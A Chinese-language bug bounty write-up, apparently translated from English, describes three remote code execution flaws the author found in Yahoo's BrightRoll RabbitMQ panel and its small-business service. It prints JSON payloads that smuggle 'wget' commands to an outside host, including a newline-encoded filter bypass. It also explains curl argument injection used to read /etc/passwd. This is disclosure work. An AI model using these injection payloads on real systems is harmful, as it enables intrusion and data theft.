今天我要分享的是，我參與雅虎（Yahoo）漏洞賞金專案發現的3個RCE漏洞。雅虎漏洞測試範圍中涉及了很多服務應用，而我發現的漏洞就與雅虎的BrightRoll應用和中小企業服務相關。

BrightRoll 是雅虎旗下的獨立視訊廣告平臺，可通過 Web、移動和連線電視吸引廣泛受眾。2014年，雅虎以6.4億美元收購BrightRoll，此舉旨在加強雅虎面向營銷者實時銷售視訊廣告的能力，該公司將進一步在視訊廣告加大投入。有了BrightRoll，雅虎就能從各渠道分發視訊廣告，無需額外程式設計，這可以為雅虎在視訊廣告業務上與Google和Facebook的競爭中增添更多砝碼。BrightRoll技術每月收集並分析了數千億個數據點，實現了廣告客戶的實時決策並提高了投資回報率。

第一個RCE漏洞

專案一開始，我就用Google、Aquatone等工具進行一些前期踩點，恰好Aquatone跳出了一個有意思的埠頁面：

好吧，我們來探究一下該頁面的具體功能，它貌似是用來執行RabbitMQ等服務應用的訊息佇列管理面板，當我點選了其中一個名為s3_adbox_setup的佇列之後，就跳到了以下頁面：

RabbitMQ是實現了高階訊息佇列協議（AMQP）的開源訊息代理軟體（亦稱面向訊息的中介軟體）。RabbitMQ伺服器是用Erlang語言編寫的，而群集和故障轉移是構建在開放電信平臺框架上的。所有主要的程式語言均有與代理介面通訊的客戶端庫。

可以看到，這有一堆的訊息佇列，我點選右上角的“New Message”之後，出來了以下表格畫面，有點奇怪我也不知道這是什麼東東：

為了建立一個新訊息，我就隨便在該表格中填了一些東西。在點選提交按鈕之後，就跳轉到了我新建立的訊息頁面，其中包含了一個視窗終端，但卻不能在裡面寫東西，其中只是跳出了一個錯誤訊息（抱歉這裡我忘了截圖）。

於是，我又回退到訊息佇列面板中，仔細觀察其中一個訊息在填寫區域的樣式，它好像是如同以下JSON格式的：

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/07/01/1649″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”22″}

我又按照該格式在引數1處建立了一個新訊息，提交跳轉後，出現了一個寫入JSON值字串的視窗終端：

於是，我把向其中寫入了 “|wget mywebsite.com” 來請求測試我的網站，沒想到請求竟然能生效，

最終的測試Payload如下：

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/07/01/1649″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”22|wget http://myhost.name“}

PoC視訊：

第二個RCE漏洞

3個月後，我又在同一個雅虎的另外一臺伺服器中發現了和第一個RCE相同的應用，同樣的埠同樣的服務，但是最終測試Payload卻不生效，伺服器對 | & ; ` { } 字元作了過濾，經過一天的分析測試，我成功對其進行了繞過。漏洞技術和第一個RCE類似，我就不作過多披露，最後生效的Payload如下：

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/10/23/2248″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”23\u000awget\u0020 http://myhost.name“}

第三個RCE漏洞

這個漏洞要算一個有意思的發現了，它與雅虎中小企業服務（yahoo small business）相關，我反覆建立和測試了相關的產品功能之後，當我訪問其中的郵件模板頁面之後，AJAX會發送一些請求，去獲取頁面上顯示的產品圖片路徑，其中一個請求是以id引數形式，向objinfo_data.php發起的，而我覺得這個php指令碼功能是用來重置產品圖片大小的。當我建立了一個產品頁時，我注意到那個用於建立產品的請求中包含了幾個指向圖片的URLs，但其中卻沒有包含二進位制影象資料。我想，如果php指令碼直接獲得產品影象的連結並使用它來調整大小，會是什麼情況呢？那應該是SSRF吧。

為此，我重新編輯了產品頁，讓其圖片URL指向我執行有netcat和其它埠的測試主機，在我用該產品的id向objinfo_data.php發起請求後，netcat顯示了具體請求內容，而且其User-Agent方式為Curl，這樣一來，我就可以執行RCE了，但可惜最終還是不行，一番折騰過後，我的一位同事建議我，可以使用“-A something“之類的命令，而且如果在netcat中出現 “User-Agent: something”，則可能存在引數字串注入，我試了一下，竟然成功了！後來，我又用上了-T標記，並最終讀取到了/etc/passwd。一切竟在PoC視訊中：

，FreeBuf 小編 clouds 編譯，轉載請註明來自 FreeBuf.COM